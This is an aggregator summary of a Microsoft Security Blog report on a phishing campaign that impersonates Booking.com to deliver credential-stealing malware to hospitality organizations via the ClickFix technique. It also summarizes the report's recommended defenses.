Source URL: https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
Source: Microsoft Security Blog
Title: Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware
Feedly Summary: Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […]
The post Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware appeared first on Microsoft Security Blog.
AI Summary and Description: Yes
**Summary:** The text provides a detailed analysis of a phishing campaign identified by Microsoft Threat Intelligence. It specifically targets the hospitality industry by impersonating Booking.com and utilizes sophisticated social engineering techniques like ClickFix to deliver malware. This campaign’s evolution and the specific tactics employed underscore a growing threat landscape, particularly signaling a need for improved security awareness and layered defenses within organizations.
**Detailed Description:**
The provided text outlines a phishing campaign dubbed Storm-1865 that exploits vulnerabilities in the hospitality sector, particularly targeting users likely to be associated with Booking.com. The campaign employs the ClickFix social engineering technique to trick individuals into downloading multiple types of credential-stealing malware.
Key points include:
– **Phishing Campaign Details:**
– **Target:** Organizations in the hospitality sector, with a focus on North America, Oceania, and Europe.
– **Methodology:** The ClickFix tactic involves creating fake error messages that prompt users to execute malicious commands.
– **Impact of ClickFix:**
– Users are tricked into using Windows features (e.g., Run) to execute commands that download malware.
– This interaction bypasses automated security measures, indicating a need for improved user education and proactive security controls.
– **Malware Varieties:** The campaign distributes various families of malware (e.g., XWorm, Lumma stealer, VenomRAT) capable of stealing financial and personal information, reflecting the campaign’s malicious intent.
– **Historical Context:** The campaign has been active with increasing aggressiveness since early 2023, adapting its techniques to evade detection.
– **Recommendations for Organizations:**
– Educate users about identifying phishing attempts and legitimate email communications.
– Implement security measures such as multi-factor authentication (MFA), phishing-resistant authentication methods, and advanced threat protection solutions like Microsoft Defender for Office 365.
– **Mitigation Techniques:**
– Use of tools such as Microsoft Defender for Endpoint and Office 365 to improve detection and response capabilities.
– Best practices include scrutinizing sender information, avoiding urgent calls to action typical of phishing campaigns, and continuous user training to identify potential threats.
– **Indicators of Compromise (IoCs):**
– Specific IP addresses and malware hashes are highlighted throughout the text, which can be utilized for threat analysis and infrastructure protection.
The information outlined in this analysis is crucial for security and compliance professionals looking to defend against evolving phishing schemes and enhance their organization’s overall security posture. By understanding these techniques and deploying the recommended strategies, organizations can better safeguard sensitive information and reduce the risk of financial fraud.